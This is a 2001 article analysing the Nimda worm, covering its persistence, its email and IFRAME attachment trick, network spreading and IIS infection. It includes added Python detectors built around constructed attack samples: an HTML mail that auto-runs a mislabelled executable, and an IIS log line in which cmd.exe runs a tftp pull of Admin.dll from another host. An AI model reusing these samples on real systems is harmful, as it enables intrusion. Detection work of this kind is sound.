Nimda - how it works. (VIRUS NOTES).
In order to run from an infected message, the worm exploits a security hole in Internet Explorer (described below). It then installs itself on the system and runs its spreading routine and payload. The worm contains the following "copyright" text string: Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
While installing, the worm copies itself to three places: to the Windows directory as MMC.EXE; to the Windows system directory as RICHED20.DLL (overwriting the original Windows RICHED20.DLL); and to the Windows system directory as LOAD.EXE.
The last copy is registered in the auto-run section of the SYSTEM.INI file:
[boot]
shell=explorer.exe load.exe -dontrunold
The worm also copies itself to the Temporary directory under random MEP*.TMP and MEP*.TMP.EXE names, for example: mep01A2.TMP, mep1A0.TMP.exe, mepE002.TMP.exe, mepE003.TMP.exe, mepE004.TMP. These .EXE files, like LOAD.EXE (see above), have the Hidden and System attributes set.
The worm then runs its spreading and payload routines. Depending on the Windows version, the worm hooks into the EXPLORER.EXE process and may run its routines as a background thread of EXPLORER.EXE.
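As an added example (not part of the original article, and not Kaspersky's or any vendor's tool), the following Python script checks the two host-side traces described above: the tokens the worm appends after explorer.exe on the [boot] shell= line of SYSTEM.INI, and the dropped file names, including executables carrying the Hidden+System attributes. The SYSTEM.INI text and the directory listing it scans are constructed samples embedded in the script. The pattern used for the temporary names generalises the MEP examples quoted above (hex digits between MEP and .TMP) and is an assumption.

```python
import re

# Constructed sample of the [boot] section of SYSTEM.INI as the worm leaves
# it.  The normal value is "shell=explorer.exe"; the worm appends its copy.
INFECTED_SYSTEM_INI = """[boot]
shell=explorer.exe load.exe -dontrunold
drivers=mmsystem.dll
"""

CLEAN_SYSTEM_INI = """[boot]
shell=explorer.exe
drivers=mmsystem.dll
"""

def shell_extras(ini_text):
    """Return every token after explorer.exe on the [boot] shell= line.

    Windows 9x/ME starts whatever is listed here, so any token beyond the
    shell itself is a persistence entry that needs explaining.  Returns []
    for a clean line and None if the file has no [boot] shell= line.
    """
    in_boot = False
    for line in ini_text.splitlines():
        stripped = line.strip()
        if stripped.startswith("[") and stripped.endswith("]"):
            in_boot = stripped.lower() == "[boot]"
            continue
        if in_boot and stripped.lower().startswith("shell="):
            tokens = stripped.split("=", 1)[1].split()
            return [t for t in tokens if t.lower() != "explorer.exe"]
    return None

# File names from the analysis above, matched against the lower-cased
# basename.  The MEP pattern is an assumption that generalises the quoted
# examples (mep01A2.TMP, mepE002.TMP.exe): "mep", hex digits, .TMP[.EXE].
DROPPED_NAMES = {
    r"^mmc\.exe$": "worm copy in the Windows directory",
    r"^riched20\.dll$": "worm copy overwriting RICHED20.DLL",
    r"^load\.exe$": "worm copy started from the SYSTEM.INI shell= line",
    r"^mep[0-9a-f]{2,4}\.tmp(\.exe)?$": "temporary worm copy (MEP*.TMP[.EXE])",
}

def scan_listing(entries):
    """entries: iterable of (path, attribute_letters), the letters being DOS
    attribute flags as "dir /a" or attrib show them (H hidden, S system,
    A archive).  Returns a list of (path, reason) findings."""
    findings = []
    for path, flags in entries:
        base = path.replace("\\", "/").rsplit("/", 1)[-1].lower()
        for pattern, reason in DROPPED_NAMES.items():
            if re.match(pattern, base):
                findings.append((path, reason))
                break
        else:
            # Unknown name, but the worm hides its copies as Hidden+System
            # executables, so report those for a closer look as well.
            if base.endswith(".exe") and "H" in flags and "S" in flags:
                findings.append((path, "unexpected Hidden+System executable"))
    return findings

# Constructed directory listing: six suspicious files among ordinary ones.
SAMPLE_LISTING = [
    (r"C:\WINDOWS\MMC.EXE", "HSA"),
    (r"C:\WINDOWS\SYSTEM\RICHED20.DLL", "A"),
    (r"C:\WINDOWS\SYSTEM\LOAD.EXE", "HS"),
    (r"C:\WINDOWS\TEMP\mep01A2.TMP", "HS"),
    (r"C:\WINDOWS\TEMP\mepE002.TMP.exe", "HS"),
    (r"C:\WINDOWS\TEMP\UPDATE.EXE", "HS"),
    (r"C:\WINDOWS\TEMP\~DF3A1B.TMP", "A"),
    (r"C:\WINDOWS\NOTEPAD.EXE", "A"),
]

if __name__ == "__main__":
    print("SYSTEM.INI extras:", shell_extras(INFECTED_SYSTEM_INI))
    for path, reason in scan_listing(SAMPLE_LISTING):
        print(f"{path}: {reason}")
```

On a real machine the listing would come from the Windows, System and Temp directories with attributes included; the name table is deliberately small, so the Hidden+System rule is what catches copies under names not listed here.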
Spreading via E-mail
In order to send infected messages, the worm connects to a mail server using the SMTP protocol and sends copies of itself to the victim addresses.
In order to obtain victim e-mail addresses, the worm uses two methods:
1. it scans *.HTM and *.HTML files and looks for e-mail-like strings;
2. using MAPI, it connects to MS Exchange mailboxes and obtains e-mail addresses from there.
The infected messages are in HTML format and contain:
Subject: empty or random
Body: empty
Attachment: README.EXE
Subjects are chosen from the name of a randomly selected file in the folder given by the registry value HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal (usually "My Documents"), or of a randomly selected file on the C: drive. In order to run from infected messages, the worm uses an "IFRAME" trick that exploits the vulnerability described in Microsoft Security Bulletin MS01-020, "Incorrect MIME Header Can Cause IE to Execute E-mail Attachment": http://www.microsoft.com/technet/security/bulletin/MS01-020.asp
Download patch: http://www.microsoft.com/windows/ie/downloads/critical/q290108/default.asp
What causes the vulnerability?
If an HTML mail contains an executable attachment, whose MIME type is incorrectly given as one of several unusual types, a flaw in IE will cause the attachment to be executed without displaying a warning dialogue.
What does the patch do?
The patch eliminates the vulnerability by correcting the table of MIME types and their associated actions in IE. This prevents e-mails from automatically launching executable attachments.
Spreading via the local network
The worm scans local drives and shared (mapped) remote drives in three different ways and infects all accessible directories there.
While infecting, the worm uses two different methods:
1. It creates .EML (in 95% of cases) or .NWS (in 5%) files with randomly selected names. As a result, these EML and NWS files end up everywhere on an infected machine (and across the local network), and there may be thousands of them. Each file contains the worm's copy in e-mail form: an HTML e-mail message carrying the worm in a MIME envelope, with the IFRAME trick described above. Upon being opened, this message immediately infects a vulnerable machine.
2. It looks for filename+extension combinations *DEFAULT*, *INDEX*, *MAIN*, *README* + .HTML, .HTM, .ASP
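The following Python script is an added example, not code from the original article or from Kaspersky: it serves both the MS01-020 description above (an executable attachment declared under a harmless MIME type, loaded by an IFRAME) and the .EML/.NWS dropping described in point 1, by parsing a message for those two traits and then walking a directory tree for .EML and .NWS files that show them. The two messages it contains are constructed samples: the "attachment" is a 32-byte stub that only begins with the MZ signature, the Content-ID, file names and addresses are made up, and audio/x-wav stands in for whichever non-executable type a given sample declares (the article does not name the type). The detector does not rely on that choice; it flags any audio, image, text or video type whose content looks executable.

```python
import base64
import email
import os
import re
import tempfile

# Constructed sample in the shape described above: an HTML mail whose hidden
# IFRAME points (via cid:) at an attached executable that is declared with a
# harmless, non-executable MIME type.  The "attachment" is a 32-byte stub that
# only begins with the MZ signature; it is not a program.
FAKE_MZ = base64.b64encode(b"MZ" + b"\x00" * 30).decode()

MALICIOUS_EML = f"""To: victim@example.test
Content-Type: multipart/related; boundary="BND"

--BND
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

<HTML><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:attach001 height=3D0 width=3D0></iframe>
</BODY></HTML>
--BND
Content-Type: audio/x-wav; name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <attach001>

{FAKE_MZ}
--BND--
"""

# Constructed benign message for comparison: a PDF attached the normal way.
BENIGN_EML = """To: victim@example.test
Content-Type: multipart/mixed; boundary="BND"

--BND
Content-Type: text/html

<HTML><BODY>Agenda attached.</BODY></HTML>
--BND
Content-Type: application/pdf; name="agenda.pdf"
Content-Transfer-Encoding: base64

JVBERi0xLjQK
--BND--
"""

EXECUTABLE_EXT = (".exe", ".com", ".scr", ".pif", ".bat", ".dll")
HARMLESS_TYPES = ("audio/", "image/", "text/", "video/")
IFRAME_CID = re.compile(r"<iframe[^>]*\bsrc\s*=\s*[\"']?cid:([^\s\"'>]+)", re.I)

def analyse_eml(raw):
    """Return reasons a message looks like a MIME-header-trick mail: a part
    declared harmless whose name or first bytes say executable, or an HTML
    IFRAME that loads an attached part by Content-ID.  [] means clean."""
    msg = email.message_from_string(raw)
    reasons, iframe_targets, content_ids = [], set(), set()
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        body = part.get_payload(decode=True) or b""
        if ctype == "text/html":
            iframe_targets.update(IFRAME_CID.findall(body.decode("latin-1")))
        cid = (part.get("Content-ID") or "").strip().strip("<>")
        if cid:
            content_ids.add(cid)
        name = (part.get_filename() or "").lower()
        looks_executable = name.endswith(EXECUTABLE_EXT) or body[:2] == b"MZ"
        if looks_executable and ctype.startswith(HARMLESS_TYPES):
            reasons.append(f"{name or cid}: executable content declared as {ctype}")
    for cid in sorted(iframe_targets & content_ids):
        reasons.append(f"IFRAME auto-loads attached part cid:{cid}")
    return reasons

def scan_tree(root):
    """Walk a tree and return (path, reasons) for every .EML/.NWS file that
    analyse_eml() flags; clean files are skipped."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith((".eml", ".nws")):
                path = os.path.join(dirpath, fname)
                with open(path, encoding="latin-1", errors="replace") as fh:
                    reasons = analyse_eml(fh.read())
                if reasons:
                    hits.append((path, reasons))
    return hits

def demo_scan():
    """Plant a worm-style readme.eml beside an ordinary page and a benign .nws
    in a throw-away tree, scan it, and return the number of flagged files."""
    with tempfile.TemporaryDirectory() as root:
        site = os.path.join(root, "inetpub", "wwwroot")
        os.makedirs(site)
        for fname, text in (("readme.eml", MALICIOUS_EML),
                            ("newsletter.nws", BENIGN_EML),
                            ("default.htm", "<html><body>welcome</body></html>")):
            with open(os.path.join(site, fname), "w") as fh:
                fh.write(text)
        return len(scan_tree(root))

if __name__ == "__main__":
    print(analyse_eml(MALICIOUS_EML), "flagged files in demo tree:", demo_scan())
```

The two checks are deliberately independent: a mail gateway that strips IFRAMEs still leaves the mislabelled executable, and a sample that uses a different delivery trick still leaves the IFRAME, so either one alone is reason to quarantine the file. Run scan_tree() against a share's root to find the dropped copies the article describes.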
Spreading as an IIS attack
To upload its file to a victim's machine, the worm uses the "tftp" command: it starts a temporary TFTP server on the infected (current) machine, which serves the "get" request issued by the victim's (remote) machine, in exactly the same way as the BlueCode (IISWorm-BlueCode) IIS worm does.
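Two places show this transfer, and the following Python script (an added example, not the article's or Kaspersky's code) checks both: the IIS log of the attacked server, where the request that tells IIS to run tftp lands together with the client address, and the wire, where the victim's tftp client sends a read request for ADMIN.DLL to UDP port 69 on the infected host. The log lines and the TFTP datagram are constructed samples; the request path in the log is a placeholder, since the pull command in the query string is what matters, and the optional -i switch is the Windows tftp.exe binary-mode flag.

```python
import re
import struct
from urllib.parse import unquote_plus

# Constructed IIS log lines in W3C extended format (fields: date time c-ip
# cs-method cs-uri-stem cs-uri-query sc-status).  The third line has the shape
# of the attack described above: the server is asked to run tftp and pull
# ADMIN.DLL from the very address that sent the request.  The request path
# is a placeholder; the tftp pull in the query is the part that matters.
SAMPLE_IIS_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-09-18 13:00:01 192.0.2.44 GET /default.htm - 200
2001-09-18 13:00:02 192.0.2.77 GET /scripts/cmd.exe /c+tftp%20-i%20192.0.2.77%20GET%20Admin.dll%20c:\\Admin.dll 200
2001-09-18 13:00:03 192.0.2.44 GET /images/logo.gif - 304
2001-09-18 13:00:04 198.51.100.9 GET /scripts/cmd.exe /c+dir 404
"""

# "tftp [-i] <server> get <file>"; -i is the Windows client's binary mode.
TFTP_PULL = re.compile(r"\btftp(?:\s+-i)?\s+(\S+)\s+get\s+(\S+)", re.I)

def tftp_hits(log_text):
    """Return (client_ip, tftp_server, filename, served_by_client) for each
    request whose URL-decoded query runs a tftp GET.  served_by_client is
    True when the TFTP server named in the command is the requesting client
    itself, which is the pattern above: the infected machine serves its own
    copy to the victim it is attacking."""
    hits = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 7:
            continue
        client_ip, query = fields[2], fields[5]
        m = TFTP_PULL.search(unquote_plus(query))
        if m:
            server, filename = m.group(1), m.group(2)
            hits.append((client_ip, server, filename, server == client_ip))
    return hits

def parse_tftp_request(packet):
    """Decode a TFTP RRQ/WRQ datagram (RFC 1350): 2-byte opcode (1 = read,
    2 = write), NUL-terminated filename, NUL-terminated mode.  Returns
    (kind, filename, mode) or None for anything else."""
    if len(packet) < 4:
        return None
    opcode = struct.unpack("!H", packet[:2])[0]
    if opcode not in (1, 2):
        return None
    parts = packet[2:].split(b"\x00")
    if len(parts) < 3:          # needs filename, mode and the final NUL
        return None
    filename = parts[0].decode("ascii", "replace")
    mode = parts[1].decode("ascii", "replace").lower()
    return ("RRQ" if opcode == 1 else "WRQ", filename, mode)

def is_admin_dll_pull(packet):
    """True for a read request for ADMIN.DLL, i.e. a victim fetching the
    worm from the temporary TFTP server on the infected machine."""
    req = parse_tftp_request(packet)
    return req is not None and req[0] == "RRQ" and req[1].lower() == "admin.dll"

# Constructed datagram: what a victim's "tftp -i <host> GET Admin.dll" sends
# to UDP port 69 on the infected host.
SAMPLE_RRQ = b"\x00\x01" + b"Admin.dll\x00" + b"octet\x00"

if __name__ == "__main__":
    for hit in tftp_hits(SAMPLE_IIS_LOG):
        print("tftp pull in IIS log:", hit)
    print("TFTP request:", parse_tftp_request(SAMPLE_RRQ),
          "ADMIN.DLL pull:", is_admin_dll_pull(SAMPLE_RRQ))
```

The served_by_client flag is the useful bit for triage: a tftp pull whose server is the requesting client marks that client as already infected and scanning, so it belongs on the block list whether or not the request returned 200. On the network side, any inbound RRQ on UDP/69 toward a web server is out of place; a server that answers it is running the worm's temporary TFTP service.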
The file uploaded to the victim's machine is named ADMIN.DLL.
Payloads
The payload routine adds the "Guest" user to the Administrators group (as a result, the "Guest" user has full access to an infected machine). The worm also opens all local drives for sharing.
Source: www.kaspersky.com
Nimda Protection Sources
Sophos
Sophos has issued protection against the Nimda virus, which can be found at: http://www.sophos.com/virusinfo/analyses/w32nimdaa.html
GFI
Mail essentials for Exchange/SMTP is an e-mail content checking and anti-virus solution that removes all types of e-mail-borne threats before they can affect an organisation's e-mail users. Spam, viruses, dangerous attachments and offensive content can be removed before the e-mail users receive them. More information can be found at http://www.gfi.com/mesindex.htm
Kaspersky
The latest Kaspersky anti-virus update urges the immediate installation of the Internet Explorer and IIS patches that close the holes. These patches not only repel "Nimda" attacks, but also those of similar worms that could appear in the future.
Publication: Database and Network Journal
Date: Oct 1, 2001